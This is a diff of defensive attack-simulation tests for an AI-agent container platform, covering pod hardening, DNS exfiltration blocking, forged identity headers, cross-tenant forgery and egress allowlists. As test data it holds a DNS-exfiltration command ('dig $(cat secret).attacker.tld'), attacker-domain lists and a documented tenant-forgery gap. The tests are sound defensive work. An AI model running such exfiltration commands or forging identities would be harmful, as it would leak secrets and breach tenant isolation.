+from rolemesh.core.types import ContainerConfig, Coworker
+
+
+def _pod(*, coworker: Coworker | None = None) -> dict[str, Any]:
+    """Build the Pod manifest the K8s runtime would POST to the API server."""
+    spec = build_container_spec(
+        [],
+        container_name="attack-sim-k8s",
+        job_id="job-1",
+        backend_config=AgentBackendConfig(name="claude", image="img", extra_env={}),
+        coworker=coworker,
+    )
+    return spec_to_pod_manifest(
+        spec, namespace="rolemesh", data_dir="/data", data_pvc="rolemesh-data"
+    )
+
+
+def _sec_ctx(pod: dict[str, Any]) -> dict[str, Any]:
+    return pod["spec"]["containers"][0]["securityContext"]
+
+
+# ---------------------------------------------------------------------------
+# A2/A3. ptrace / kcore — capability drop
+# ---------------------------------------------------------------------------
+
+
+def test_A2_k8s_capabilities_drop_all() -> None:
+    """Attacker: ptrace a sibling / mount /proc/kcore — both need Linux
+    capabilities. Defense: securityContext.capabilities.drop == [ALL] and
+    no dangerous cap is added back."""
+    sc = _sec_ctx(_pod())
+    caps = sc["capabilities"]
+    assert "ALL" in caps["drop"], (
+        f"capabilities.drop must contain ALL; got {caps['drop']!r}"
+    )
+    dangerous = {
+        "SYS_ADMIN", "CAP_SYS_ADMIN", "SYS_MODULE", "CAP_SYS_MODULE",
+        "SYS_PTRACE", "CAP_SYS_PTRACE", "SYS_RAWIO", "CAP_SYS_RAWIO",
+    }
+    added = {c.upper() for c in caps.get("add", [])}
+    assert not (added & dangerous), f"capabilities.add leaks dangerous caps: {added & dangerous}"
+
+
+def test_A2_k8s_no_privilege_escalation_and_seccomp() -> None:
+    """no-new-privileges → allowPrivilegeEscalation: false; the default
+    seccomp profile blocks ptrace/mount syscalls → seccompProfile is
+    RuntimeDefault (NOT Unconfined, which would disable it)."""
+    sc = _sec_ctx(_pod())
+    assert sc["allowPrivilegeEscalation"] is False, (
+        "allowPrivilegeEscalation must be false (no-new-privileges analog)"
+    )
+    assert sc["seccompProfile"]["type"] == "RuntimeDefault", (
+        f"seccomp must stay RuntimeDefault; got {sc['seccompProfile']!r}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# A4. Rootfs write
+# ---------------------------------------------------------------------------
+
+
+def test_A4_k8s_rootfs_is_readonly() -> None:
+    """Attacker: persist code by writing rootfs (/etc/*, rc.local). Defense:
+    readOnlyRootFilesystem flips / to read-only; writable scratch comes only
+    from emptyDir-backed tmpfs mounts."""
+    assert _sec_ctx(_pod())["readOnlyRootFilesystem"] is True, (
+        "readOnlyRootFilesystem must be true to block rootfs persistence"
+    )
+
+
+# ---------------------------------------------------------------------------
+# A7. Privileged container + run-as-root
+# ---------------------------------------------------------------------------
+
+
+def test_A7_k8s_never_privileged_runs_nonroot() -> None:
+    """Privileged=true would undo every other control; running as UID 0
+    re-opens many escapes. Defense: the manifest never sets privileged and
+    pins runAsNonRoot + a non-zero UID."""
+    sc = _sec_ctx(_pod())
+    assert sc.get("privileged", False) is False, "privileged must never be true"
+    assert sc["runAsNonRoot"] is True, "runAsNonRoot must be true"
+    # When a uid is pinned it must not be root.
+    assert sc.get("runAsUser", 1) != 0, "runAsUser must not be 0 (root)"
+
+
+# ---------------------------------------------------------------------------
+# A9 (k8s-specific). ServiceAccount token theft
+# ---------------------------------------------------------------------------
+
+
+def test_A9_k8s_service_account_token_not_mounted() -> None:
+    """K8s-only escape vector: a pod that automounts its ServiceAccount token
+    hands an attacker a credential to the API server (and from there, lateral
+    movement). Defense: automountServiceAccountToken: false — agent pods get
+    no token at all."""
+    pod_spec = _pod()["spec"]
+    assert pod_spec["automountServiceAccountToken"] is False, (
+        "automountServiceAccountToken must be false — an agent must not carry "
+        "an API-server credential"
+    )
+
+
+# ---------------------------------------------------------------------------
+# A5. Cloud metadata theft — hostAliases blackhole + NetworkPolicy coverage
+# ---------------------------------------------------------------------------
+
+
+def test_A5_k8s_metadata_endpoints_blackholed_in_host_aliases() -> None:
+    """Defense-in-depth pin: the spec's metadata blackhole is mapped to
+    hostAliases (the primary K8s defense is the default-deny NetworkPolicy,
+    but the hostAliases mapping must not silently drop)."""
+    pod_spec = _pod()["spec"]
+    aliases = pod_spec.get("hostAliases") or []
+    blackholed: dict[str, str] = {}
+    for entry in aliases:
+        for host in entry.get("hostnames", []):
+            blackholed[host] = entry["ip"]
+    for host in ("metadata.google.internal", "169.254.169.254"):
+        assert blackholed.get(host) == "127.0.0.1", (
+            f"metadata endpoint {host!r} must be blackholed to 127.0.0.1 in "
+            f"hostAliases; got {blackholed.get(host)!r}"
+        )
+
+
+def test_A5_k8s_pod_carries_agent_labels_for_network_policy() -> None:
+    """The default-deny + gateway-only-egress NetworkPolicies select agent
+    pods by ``rolemesh.io/role=agent``. If the orchestrator stops stamping
+    that label, agent pods silently fall OUT of every isolation policy — a
+    full egress/metadata escape. Pin the label contract here."""
+    labels = _pod()["metadata"]["labels"]
+    assert labels.get(AGENT_ROLE_LABEL) == AGENT_ROLE_VALUE, (
+        f"pod must carry {AGENT_ROLE_LABEL}={AGENT_ROLE_VALUE} so the agent "
+        f"NetworkPolicies select it; got labels {labels!r}"
+    )
+    # The isolation policies the chart must declare for these pods.
+    assert set(REQUIRED_AGENT_NETWORK_POLICIES) == {
+        NETPOL_AGENT_DEFAULT_DENY,
+        NETPOL_AGENT_ALLOW_EGRESS,
+    }
+    # Sanity: the stamped labels are exactly the policy selector contract.
+    assert AGENT_POD_LABELS[AGENT_ROLE_LABEL] == AGENT_ROLE_VALUE
+
+
+# ---------------------------------------------------------------------------
+# A8. Swap amplification — node-level on K8s (documented non-mapping)
+# ---------------------------------------------------------------------------
+
+
+def test_A8_k8s_memory_limit_bounds_without_swap_field() -> None:
+    """On Docker, A8 pins MemorySwap == Memory. On K8s swap is a node-level
+    setting with no pod field (docs/21 §8), so memory is bounded by
+    resources.limits.memory alone. Assert the limit is emitted so an agent
+    cannot request unbounded memory; the no-swap guarantee is a node/kubelet
+    invariant, not a manifest field."""
+    cw = Coworker(
+        id="cw",
+        tenant_id="t",
+        name="Test",
+        folder="f",
+        container_config=ContainerConfig(memory_limit="512m"),
+    )
+    container = _pod(coworker=cw)["spec"]["containers"][0]
+    limits = container.get("resources", {}).get("limits", {})
+    assert "memory" in limits, (
+        "a memory limit must be emitted so the agent cannot exhaust node RAM"
+    )
+    # No pod-level swap knob exists; ensure we did not invent a bogus one.
+    assert "memory-swap" not in limits and "memorySwap" not in limits

--- a/tests/attack_sim/test_D_data_exfil.py
+++ b/tests/attack_sim/test_D_data_exfil.py
@@ -5,8 +5,9 @@ Attacks:
   D2. Tool call to attacker URL (dict field)     → domain_allowlist catches
   D3. URL hidden inside Bash command string      → domain_allowlist DOES
                                                    scan string leaves (good)
-  D4. DNS exfiltration (dig $secret.attacker.tld) → XFAIL; egress control
-                                                   not implemented
+  D4. DNS exfiltration (dig $secret.attacker.tld) → egress gateway DNS
+                                                   resolver (EC-2) NXDOMAINs
+                                                   any non-allowlisted name
   D5. Tool call to pastebin / paste.ee / transfer.sh → domain_allowlist
 """
 
@@ -116,45 +117,75 @@ async def test_D3_url_in_bash_command_string_detected() -> None:
 
 
 # ---------------------------------------------------------------------------
-# D4. DNS exfiltration — XFAIL (egress control not implemented)
+# D4. DNS exfiltration — defended by the egress gateway DNS resolver (EC-2)
 # ---------------------------------------------------------------------------
 
 
-@pytest.mark.xfail(
-    reason=(
-        "Egress control (Gateway + DNS resolver) not implemented. "
-        "Agent can still run 'dig $secret.attacker.tld' inside a Bash "
-        "tool call — the DNS query itself tunnels the secret. "
-        "domain_allowlist can only inspect URL-shaped payloads, not "
-        "arbitrary shell subprocess DNS lookups. Closes when EC-2 "
-        "DNS resolver ships (see tmp.txt design v2 §6.1 R9)."
-    ),
-    strict=True,
-)
-async def test_D4_dns_exfiltration_prevented() -> None:
-    """Documenting test. Asserts the ideal: a Bash tool command doing
-    DNS exfil should be blocked. Currently no defense layer sees
-    DNS queries, so the payload string ``dig some-secret.attacker.tld``
-    is NOT flagged by domain_allowlist (it's not an HTTP URL).
+def test_D4_dns_exfiltration_blocked_by_egress_dns_policy() -> None:
+    """Attacker: smuggle a secret out as a DNS label —
+    ``dig $(cat secret).attacker.tld`` — so the query NAME itself is the
+    channel. The ``domain_allowlist`` content-safety check used in D2/D3
+    is the wrong layer for this by construction: the payload is a shell
+    string, not an HTTP URL, and a raw ``getaddrinfo`` never produces a
+    URL leaf to inspect.
 
-    Will pass when:
-      * egress control ships a DNS white-list resolver, OR
-      * a dedicated ``dns_exfil`` check is added to safety framework.
+    Defense (EC-2, shipped — src/rolemesh/egress/, docs/16): the agent's
+    ONLY resolver is the egress gateway's authoritative DNS server,
+    governed by ``GlobalDnsPolicy`` in ``enforce`` mode with an allowlist
+    that is EMPTY in steady state. Any name not explicitly allowlisted is
+    NXDOMAIN'd before it can reach an upstream resolver, so the exfil
+    query never leaves the gateway.
+
+    This row was historically a strict ``xfail`` documenting "egress
+    control not implemented". EC-2 landed, so the assertion now states the
+    defense holds. The gateway-socket plumbing is covered by
+    ``tests/egress/test_dns_*``; here we pin the policy contract that an
+    attacker-controlled zone is refused.
     """
-    from rolemesh.safety.checks.domain_allowlist import DomainAllowlistCheck
+    from rolemesh.egress.dns_policy import GlobalDnsPolicy
 
-    check = DomainAllowlistCheck()
-    # DNS-exfil payload — no HTTP URL.
-    verdict = await check.check(
-        _tool_ctx(
-            "Bash",
-            {"command": "dig some-secret.attacker.tld"},
-        ),
-        {"allowed_hosts": ["api.anthropic.com"]},
+    # Steady-state production posture: enforce + empty allowlist.
+    policy = GlobalDnsPolicy()
+    assert policy.mode == "enforce", (
+        "default DNS posture must be fail-closed (enforce), else exfil "
+        "names resolve"
     )
-    assert verdict.action == "block", (
-        "DNS exfil pattern currently passes — no defense in place"
-    )
+
+    exfil_names = [
+        "deadbeefcafe.attacker.tld",
+        "c2VjcmV0.exfil.evil.example",  # base64-ish secret label
+        "a.very.long.chain.of.secret.labels.attacker.example",
+    ]
+    for qname in exfil_names:
+        assert not policy.is_allowed(qname), (
+            f"DNS exfil name {qname!r} would resolve through the gateway — "
+            "the empty enforce-mode allowlist must NXDOMAIN it"
+        )
+
+
+def test_D4_dns_allowlist_is_positive_and_subdomain_safe() -> None:
+    """Even a NON-empty allowlist must not become an exfil hole. A
+    ``*.github.com`` entry (a plausible operator allowance) must NOT match
+    an attacker zone that merely embeds the allowed name as a left label —
+    ``github.com.attacker.tld`` — which a naive ``endswith`` allowlist
+    would wave through. This pins the suffix-vs-substring property of the
+    shared ``matches_domain`` matcher that both DNS and HTTP planes use."""
+    from rolemesh.egress.dns_policy import GlobalDnsPolicy
+
+    policy = GlobalDnsPolicy(patterns=("api.anthropic.com", "*.github.com"))
+    # Legit allowlisted names resolve (false-positive control).
+    assert policy.is_allowed("api.anthropic.com")
+    assert policy.is_allowed("raw.github.com")
+    # Attacker zones that embed an allowed label must still be refused.
+    for evil in (
+        "github.com.attacker.tld",  # allowed label as a LEFT prefix
+        "api.anthropic.com.evil.example",  # exact name + attacker suffix
+        "notgithub.com",  # suffix without the dot boundary
+    ):
+        assert not policy.is_allowed(evil), (
+            f"{evil!r} must not match a *.github.com / exact allowlist — "
+            "left-label / suffix-confusion exfil bypass"
+        )
 
 
 # ---------------------------------------------------------------------------

--- a/tests/attack_sim/test_E_identity_isolation.py
+++ b/tests/attack_sim/test_E_identity_isolation.py
@@ -1,0 +1,244 @@
+"""E (identity isolation). Forged identity header must not steer credentials.
+
+RoleMesh's per-user / per-tenant credential isolation is enforced at the
+credential proxy (``rolemesh.egress.reverse_proxy``), not in the model. A
+container is only half-trusted: once injected / jailbroken it can put any
+``X-RoleMesh-User-Id`` it likes on its outbound MCP/LLM requests. The proxy
+must therefore derive identity from the VERIFIED signed token in the URL
+path (``identity`` from ``TokenAuthority.verify``), never from that header.
+
+These are white-box, deterministic tests: they boot the real
+``start_credential_proxy`` app in-process and drive it over real HTTP. The
+only fakes are at true boundaries — the upstream MCP/LLM server (an echo),
+the token vault, and the credential resolver. No Docker, no DB; sub-second.
+
+The LLM-jailbreak face of this (can a prompt make the agent emit the
+header?) belongs to the promptfoo black-box run, which today cannot reach
+this code at all because ``redteam/seed.py`` pins ``auth_mode="service"``.
+That dead-code gap is exactly why a deterministic white-box pin is needed.
+
+  E7 (MCP)      forged X-RoleMesh-User-Id: userB on a userA-token request
+                must NOT fetch userB's OIDC token from the vault.
+  E7 (provider) the LLM credential is selected by identity.tenant_id; a
+                forged header has no effect (control — pins the path that
+                is already correct, and shows the pattern the MCP path
+                must follow).
+"""
+
+from __future__ import annotations
+
+import socket
+from typing import Any
+
+import aiohttp
+import pytest
+from aiohttp import web
+
+from rolemesh.egress import reverse_proxy as rp
+from rolemesh.egress.credentials import MissingCredentialError
+from rolemesh.egress.reverse_proxy import register_mcp_server, start_credential_proxy
+from rolemesh.egress.token_identity import Identity, TokenAuthority
+
+_USER_ID_HEADER = "X-RoleMesh-User-Id"
+_AUTHORITY = TokenAuthority(secret="attack-sim-e7-secret-16+chars", ttl_seconds=3600)
+
+
+# ---------------------------------------------------------------------------
+# In-process boundary fakes
+# ---------------------------------------------------------------------------
+
+
+class _Echo:
+    """Real upstream that records the headers each request arrived with."""
+
+    def __init__(self) -> None:
+        self.received: list[dict[str, Any]] = []
+        self._runner: web.AppRunner | None = None
+        self.port = 0
+
+    async def start(self) -> None:
+        async def handler(request: web.Request) -> web.Response:
+            self.received.append({"headers": dict(request.headers)})
+            return web.Response(status=200, text="ok")
+
+        app = web.Application()
+        app.router.add_route("*", "/{path:.*}", handler)
+        self._runner = web.AppRunner(app)
+        await self._runner.setup()
+        site = web.TCPSite(self._runner, "127.0.0.1", 0)
+        await site.start()
+        self.port = site._server.sockets[0].getsockname()[1]  # type: ignore[union-attr]
+
+    async def stop(self) -> None:
+        if self._runner is not None:
+            await self._runner.cleanup()
+
+    def last_headers(self) -> dict[str, str]:
+        assert self.received, "request never reached the upstream"
+        return {k.lower(): v for k, v in self.received[-1]["headers"].items()}
+
+
+class _StubVault:
+    """Token vault keyed by user_id — records which user_id was looked up."""
+
+    def __init__(self, tokens: dict[str, str]) -> None:
+        self._tokens = tokens
+        self.lookups: list[str] = []
+
+    async def get_fresh_access_token(self, user_id: str) -> str | None:
+        self.lookups.append(user_id)
+        return self._tokens.get(user_id)
+
+
+class _RecordingResolver:
+    """Credential resolver that records every (tenant_id, provider) asked."""
+
+    def __init__(self) -> None:
+        self.calls: list[tuple[str, str]] = []
+
+    async def resolve(self, tenant_id: str, provider: str) -> dict[str, Any]:
+        self.calls.append((tenant_id, provider))
+        return {"api_key": f"KEY-{tenant_id}"}
+
+
+class _NullResolver:
+    """The MCP path must never consult the credential resolver."""
+
+    async def resolve(self, tenant_id: str, provider: str) -> dict[str, Any]:
+        raise MissingCredentialError(
+            f"resolver must not be called on the MCP path ({tenant_id}/{provider})"
+        )
+
+
+# ---------------------------------------------------------------------------
+# Harness helpers
+# ---------------------------------------------------------------------------
+
+
+def _free_port() -> int:
+    with socket.socket() as s:
+        s.bind(("127.0.0.1", 0))
+        return int(s.getsockname()[1])
+
+
+def _token(*, user_id: str, tenant_id: str) -> str:
+    """Mint the signed egress token the orchestrator bakes into the proxy URL."""
+    return _AUTHORITY.mint(
+        Identity(
+            tenant_id=tenant_id,
+            coworker_id="cw-1",
+            user_id=user_id,
+            conversation_id="conv-1",
+            job_id="job-1",
+            container_name="c-1",
+        )
+    )
+
+
+async def _start_proxy(resolver: Any) -> tuple[web.AppRunner, int]:
+    port = _free_port()
+    runner = await start_credential_proxy(
+        port=port,
+        host="127.0.0.1",
+        credential_resolver=resolver,
+        token_authority=_AUTHORITY,
+        safety_caller=None,  # no-op gate; we are testing identity, not safety
+    )
+    return runner, port
+
+
+@pytest.fixture(autouse=True)
+def _restore_proxy_globals() -> Any:
+    """Snapshot + restore the reverse_proxy module globals these tests mutate
+    (``_token_vault`` and ``_mcp_registry``) so they never leak across tests."""
+    saved_vault = rp._token_vault
+    saved_registry = dict(rp._mcp_registry)
+    yield
+    rp._token_vault = saved_vault
+    rp._mcp_registry.clear()
+    rp._mcp_registry.update(saved_registry)
+
+
+# ---------------------------------------------------------------------------
+# E7 — MCP path: forged header must not select another user's vault token
+# ---------------------------------------------------------------------------
+
+
+async def test_E7_mcp_forged_user_id_header_does_not_select_another_users_token() -> None:
+    """Attacker: a userA container (holding a valid userA egress token) sends
+    an MCP request with ``X-RoleMesh-User-Id: userB`` forged in the headers,
+    hoping the proxy fetches userB's OIDC access token from the shared vault
+    and forwards it upstream. Defense: identity comes from the verified token
+    (identity.user_id == userA), so the vault is asked for userA's token and
+    the upstream sees userA's bearer — never userB's."""
+    echo = _Echo()
+    await echo.start()
+    vault = _StubVault({"userA": "token-A", "userB": "token-B"})
+    rp.set_token_vault(vault)
+    register_mcp_server("acme", f"http://127.0.0.1:{echo.port}", auth_mode="user")
+    runner, port = await _start_proxy(_NullResolver())
+    try:
+        token = _token(user_id="userA", tenant_id="tenant-a")
+        url = f"http://127.0.0.1:{port}/mcp-proxy/{token}/acme/mcp"
+        async with (
+            aiohttp.ClientSession() as session,
+            session.post(url, data=b"{}", headers={_USER_ID_HEADER: "userB"}) as resp,
+        ):
+            await resp.read()
+
+        upstream = echo.last_headers()
+        assert upstream.get("authorization") == "Bearer token-A", (
+            f"proxy forwarded {upstream.get('authorization')!r}; a forged "
+            "X-RoleMesh-User-Id:userB must NOT fetch userB's token — identity "
+            "must come from the verified egress token, not the request header"
+        )
+        # userB's token must never even be looked up.
+        assert "userB" not in vault.lookups, (
+            f"vault was queried for a forged user_id: {vault.lookups}"
+        )
+        # The (forgeable) identity header must not leak to the upstream MCP server.
+        assert _USER_ID_HEADER.lower() not in upstream
+    finally:
+        await runner.cleanup()
+        await echo.stop()
+
+
+# ---------------------------------------------------------------------------
+# E7 (provider control) — LLM credential keys on the token's tenant, not header
+# ---------------------------------------------------------------------------
+
+
+async def test_E7_provider_credential_selection_ignores_forged_user_id_header(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """Control: the provider (LLM) path already does it right — the credential
+    is resolved by identity.tenant_id from the verified token, and the
+    X-RoleMesh-User-Id header plays no part in selection. A forged header
+    must not change which credential is fetched. This pins the correct
+    pattern the MCP path (E7 above) must mirror."""
+    echo = _Echo()
+    await echo.start()
+    monkeypatch.setenv("OPENAI_BASE_URL", f"http://127.0.0.1:{echo.port}")
+    resolver = _RecordingResolver()
+    runner, port = await _start_proxy(resolver)
+    try:
+        token = _token(user_id="userA", tenant_id="tenant-a")
+        url = f"http://127.0.0.1:{port}/proxy/{token}/openai/v1/chat/completions"
+        async with (
+            aiohttp.ClientSession() as session,
+            session.post(url, data=b"{}", headers={_USER_ID_HEADER: "userB"}) as resp,
+        ):
+            await resp.read()
+
+        # Credential selected strictly by the token's tenant; the forged
+        # header never enters the lookup key.
+        assert resolver.calls == [("tenant-a", "openai")], (
+            f"LLM credential must be keyed on the token's tenant, not the "
+            f"forged header; resolver calls={resolver.calls}"
+        )
+        upstream = echo.last_headers()
+        assert upstream.get("authorization") == "Bearer KEY-tenant-a"
+        assert _USER_ID_HEADER.lower() not in upstream
+    finally:
+        await runner.cleanup()
+        await echo.stop()

--- a/tests/attack_sim/test_E_tenant_isolation.py
+++ b/tests/attack_sim/test_E_tenant_isolation.py
@@ -1,0 +1,232 @@
+"""E. Tenant isolation — cross-tenant access attempts.
+
+Attacker legitimately controls their own tenant A and tries to make the
+orchestrator act on, or read, victim tenant B.
+
+Historical note: the original E1/E2 drove the approval engine's
+``handle_auto_intercept`` (deleted with the human-approval subsystem in
+6d79276). The *defense* — "take the trusted tenant from the authoritative
+coworker lookup, never from the attacker's payload claim" — did not go
+away; it now lives on the safety RPC / event planes. These tests pin that
+live guard: ``SafetyRpcServer._handle_request_inner`` drops any request
+whose claimed ``tenant_id`` disagrees with the authoritative tenant of the
+claimed ``coworker_id`` (the same shape ``safety/subscriber.py`` uses for
+events).
+
+  E1. Forge tenantId (keep own coworker)      → drop: tenant_id mismatch.
+  E2. Forge coworkerId of another tenant       → drop: the coworker's
+                                                 authoritative tenant ≠ the
+                                                 claimed tenant.
+  E2b. Forge a coworkerId that doesn't exist   → drop: unknown coworker.
+  E3. Consistent own identity (control)        → passes the identity gate
+                                                 (reaches check lookup).
+  E6. NATS subject sidechannel                 → XFAIL: a FULLY consistent
+                                                 forge (victim coworker_id +
+                                                 victim tenant_id) still
+                                                 passes this guard; only
+                                                 NATS account-per-tenant
+                                                 closes it.
+"""
+
+from __future__ import annotations
+
+import json
+from typing import Any
+
+import pytest
+
+from rolemesh.core.types import Coworker
+from rolemesh.safety.registry import CheckRegistry
+from rolemesh.safety.rpc_codec import serialize_context
+from rolemesh.safety.rpc_server import SafetyRpcServer
+from rolemesh.safety.types import SafetyContext, Stage
+
+
+class _CapturingMsg:
+    """Stand-in for a core-NATS message — the external transport boundary.
+
+    Captures the server's reply so the test can assert on it. Faking the
+    NATS msg (not any rolemesh code) is legitimate: it is the network edge,
+    exactly the boundary the project's testing guidance allows to mock."""
+
+    def __init__(self, payload: dict[str, Any]) -> None:
+        self.data = json.dumps(payload).encode("utf-8")
+        self.reply: dict[str, Any] | None = None
+
+    async def respond(self, data: bytes) -> None:
+        self.reply = json.loads(data)
+
+
+def _server(coworkers: list[Coworker]) -> SafetyRpcServer:
+    """Build a real SafetyRpcServer.
+
+    ``coworker_lookup`` is a ``Callable[[str], TrustedCoworker | None]`` —
+    dependency-injected in production. A dict over real ``Coworker`` objects
+    IS that contract (not a mock of an internal module). The registry is
+    empty so a legitimate request falls through to an "unknown check_id"
+    reply, which is the signal that the identity gate let it pass.
+    nats_client / thread_pool are unused on the identity-reject and
+    unknown-check paths, so they need no broker or pool here.
+    """
+    by_id = {c.id: c for c in coworkers}
+    return SafetyRpcServer(
+        nats_client=None,
+        registry=CheckRegistry(),
+        thread_pool=None,  # type: ignore[arg-type]  # never reached in these paths
+        coworker_lookup=by_id.get,
+    )
+
+
+def _request(*, claimed_tenant: str, claimed_coworker: str, check_id: str = "x.check") -> dict[str, Any]:
+    ctx = SafetyContext(
+        stage=Stage.PRE_TOOL_CALL,
+        tenant_id=claimed_tenant,
+        coworker_id=claimed_coworker,
+        user_id="u",
+        job_id="j",
+        conversation_id="c",
+        payload={"tool_name": "refund", "tool_input": {"amount": 9999}},
+    )
+    return {
+        "request_id": "r1",
+        "context": serialize_context(ctx),
+        "check_id": check_id,
+        "config": {},
+    }
+
+
+_ATTACKER = Coworker(id="cw-attacker", tenant_id="t-attacker", name="A", folder="a")
+_VICTIM = Coworker(id="cw-victim", tenant_id="t-victim", name="V", folder="v")
+
+
+# ---------------------------------------------------------------------------
+# E1. Forge tenantId in the request payload
+# ---------------------------------------------------------------------------
+
+
+async def test_E1_forged_tenant_id_dropped() -> None:
+    """Attacker: tenant A's container sends a safety RPC for its OWN coworker
+    but claims ``tenant_id = victim B`` in the payload, hoping the
+    orchestrator runs the check against B's view. Defense: the authoritative
+    tenant of ``cw-attacker`` is A; A ≠ B, so the request is dropped before
+    any check runs."""
+    server = _server([_ATTACKER, _VICTIM])
+    msg = _CapturingMsg(
+        _request(claimed_tenant=_VICTIM.tenant_id, claimed_coworker=_ATTACKER.id)
+    )
+    await server._handle_request(msg)
+
+    assert msg.reply is not None
+    assert msg.reply["verdict"] is None, "a dropped request must not run a check"
+    assert "tenant_id mismatch" in msg.reply["error"], (
+        f"forged tenant must be dropped; got {msg.reply['error']!r}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# E2. Forge coworkerId belonging to another tenant
+# ---------------------------------------------------------------------------
+
+
+async def test_E2_forged_coworker_id_dropped() -> None:
+    """Attacker: tenant A claims victim B's ``coworker_id`` but (not knowing
+    B's tenant) keeps its own ``tenant_id = A``. Defense: the authoritative
+    tenant of ``cw-victim`` is B; B ≠ A → dropped. The guard anchors on the
+    coworker's real tenant, never on the claim."""
+    server = _server([_ATTACKER, _VICTIM])
+    msg = _CapturingMsg(
+        _request(claimed_tenant=_ATTACKER.tenant_id, claimed_coworker=_VICTIM.id)
+    )
+    await server._handle_request(msg)
+
+    assert msg.reply is not None
+    assert msg.reply["verdict"] is None
+    assert "tenant_id mismatch" in msg.reply["error"], (
+        f"cross-tenant coworker claim must be dropped; got {msg.reply['error']!r}"
+    )
+
+
+async def test_E2b_unknown_coworker_id_dropped() -> None:
+    """Attacker forges a ``coworker_id`` that exists in no tenant. Defense:
+    the lookup returns None → request refused (no silent tenant adoption)."""
+    server = _server([_ATTACKER, _VICTIM])
+    msg = _CapturingMsg(
+        _request(claimed_tenant=_ATTACKER.tenant_id, claimed_coworker="cw-ghost")
+    )
+    await server._handle_request(msg)
+
+    assert msg.reply is not None
+    assert msg.reply["verdict"] is None
+    assert "unknown coworker_id" in msg.reply["error"], (
+        f"unknown coworker must be dropped; got {msg.reply['error']!r}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# E3. Control — a consistent, legitimate identity passes the tenant gate
+# ---------------------------------------------------------------------------
+
+
+async def test_E3_consistent_identity_passes_tenant_gate() -> None:
+    """Anti-false-positive control: a request whose claimed (tenant, coworker)
+    pair is internally consistent must NOT be rejected at the identity gate.
+    With an empty registry it falls through to an ``unknown check_id`` reply —
+    a DIFFERENT error than ``tenant_id mismatch`` — which proves the tenant
+    guard let it through rather than blocking a benign caller."""
+    server = _server([_ATTACKER, _VICTIM])
+    msg = _CapturingMsg(
+        _request(
+            claimed_tenant=_ATTACKER.tenant_id,
+            claimed_coworker=_ATTACKER.id,
+            check_id="x.check",
+        )
+    )
+    await server._handle_request(msg)
+
+    assert msg.reply is not None
+    assert "tenant_id mismatch" not in (msg.reply["error"] or "")
+    assert "unknown coworker_id" not in (msg.reply["error"] or "")
+    assert "unknown check_id" in msg.reply["error"], (
+        "a legitimate identity must reach check lookup, not be dropped at the "
+        f"tenant gate; got {msg.reply['error']!r}"
+    )
+
+
+# ---------------------------------------------------------------------------
+# E6. NATS subject sidechannel — XFAIL (no NATS account-per-tenant)
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.xfail(
+    reason=(
+        "The authoritative-tenant guard only catches an INCONSISTENT forge "
+        "(coworker_id and tenant_id from different tenants). A container that "
+        "knows a victim's coworker_id AND its matching tenant_id can present "
+        "the consistent pair on core NATS and the guard agrees — there is no "
+        "per-tenant transport authentication binding a connection to a tenant. "
+        "Closes with NATS account-per-tenant / tenant-scoped credentials so a "
+        "connection cannot publish another tenant's coworker identity at all "
+        "(see docs/17 §E6, docs/4)."
+    ),
+    strict=True,
+)
+async def test_E6_consistent_cross_tenant_forge_is_rejected() -> None:
+    """Documenting test for the NATS-ACL gap. The IDEAL: even a fully
+    consistent forge of a victim's identity is rejected because the
+    transport itself binds the connection to tenant A. Today the safety RPC
+    guard accepts the consistent (cw-victim, t-victim) pair, so this asserts
+    a property the platform does not yet provide."""
+    server = _server([_ATTACKER, _VICTIM])
+    msg = _CapturingMsg(
+        # Fully consistent victim identity — the guard cannot tell this came
+        # from the attacker's connection.
+        _request(claimed_tenant=_VICTIM.tenant_id, claimed_coworker=_VICTIM.id)
+    )
+    await server._handle_request(msg)
+
+    assert msg.reply is not None
+    # Ideal (currently FALSE): the forge is refused on identity grounds.
+    assert msg.reply["error"] and "tenant" in msg.reply["error"], (
+        "consistent cross-tenant identity forge is currently accepted — "
+        "NATS account-per-tenant not yet in force"
+    )

--- a/tests/attack_sim/test_I_egress_gateway.py
+++ b/tests/attack_sim/test_I_egress_gateway.py
@@ -1,0 +1,177 @@
+"""I. Network egress — gateway-plane attacks.
+
+The third defense layer (after container hardening and the content-safety
+pipeline) is the egress gateway: every outbound TCP/HTTP(S) attempt is
+funneled through the forward proxy, and every raw DNS lookup through the
+gateway's authoritative resolver. Both planes enforce a *positive*
+allowlist — what is explicitly permitted, nothing else.
+
+These tests drive the REAL gateway decision seams, not a re-implementation:
+
+  * ``make_egress_domain_check()`` returns the exact async callable the
+    gateway's ``safety_call`` aggregator invokes for the ``egress.domain_rule``
+    check. It reports ``matched: bool``; the aggregator blocks a request
+    when NO rule voted allow.
+  * ``GlobalDnsPolicy`` is the platform DNS allowlist the gateway's DNS
+    server consults.
+
+Backed by docs/16-egress-control-architecture.md. The socket/CONNECT
+plumbing is covered by ``tests/egress/``; this file is the attack-narrative
+regression net over the policy contracts those sockets enforce.
+
+Attacks:
+
+  I1. Forward-proxy CONNECT to a non-allowlisted attacker host
+      → no rule matches → gateway blocks.
+  I2. Port smuggling: reach an allowlisted SNI on a non-allowlisted port
+      (SSH on a host whose name matches ``*.github.com``)
+      → port scoping refuses the match.
+  I3. Malformed rule config must fail CLOSED, never accidentally allow.
+  I4. Empty / missing host must not be waved through.
+  I5. DNS enforcement mode is fail-closed and a typo'd mode kills boot.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from rolemesh.egress.dns_policy import ALLOWLIST_ENV, MODE_ENV, GlobalDnsPolicy
+from rolemesh.egress.safety_call import EgressRequest
+from rolemesh.safety.checks.egress_domain_rule import make_egress_domain_check
+
+
+def _req(host: str, port: int) -> EgressRequest:
+    """A forward-proxy CONNECT view — the host is agent-CONTROLLED, which is
+    exactly why the gateway must re-decide it rather than trust it."""
+    return EgressRequest(host=host, port=port, mode="forward", method="CONNECT")
+
+
+# A tight, realistic operator allowlist: a couple of SaaS endpoints on 443.
+_ALLOWLIST = {"domain_patterns": ["api.anthropic.com", "*.github.com"], "ports": [443]}
+
+
+# ---------------------------------------------------------------------------
+# I1. CONNECT to a non-allowlisted host
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "attacker_host",
+    [
+        "evil.attacker.com",
+        "github.com.attacker.tld",  # allowlisted label as a LEFT prefix
+        "api.anthropic.com.evil.example",  # exact name + attacker suffix
